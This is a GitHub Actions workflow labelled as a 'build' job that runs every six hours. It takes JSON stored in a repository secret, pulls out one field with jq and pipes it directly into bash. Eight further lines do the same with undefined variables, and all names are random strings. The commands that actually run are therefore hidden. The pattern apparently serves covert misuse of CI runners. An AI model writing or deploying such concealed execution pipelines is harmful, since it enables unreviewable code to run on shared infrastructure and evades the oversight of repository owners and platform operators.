name: temptanaconda
on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: temptanaconda
        env:
          iahm1111: ${{ secrets.iahm1111 }}
        run: |
          echo $iahm1111 | jq -r .zokbx108 | /bin/bash
          echo $ngw52413 | jq -r .zs896 | /bin/bash
          echo $gxwfp875 | jq -r .fgab97 | /bin/bash
          echo $gm5464 | jq -r .vqx850 | /bin/bash
          echo $iymzm6 | jq -r .jwd764 | /bin/bash
          echo $zsef729 | jq -r .hhh312 | /bin/bash
          echo $a1 | jq -r .ngqxp7178 | /bin/bash
          echo $mf524 | jq -r .cgx5 | /bin/bash
          echo $wtylv56 | jq -r .h6 | /bin/bash

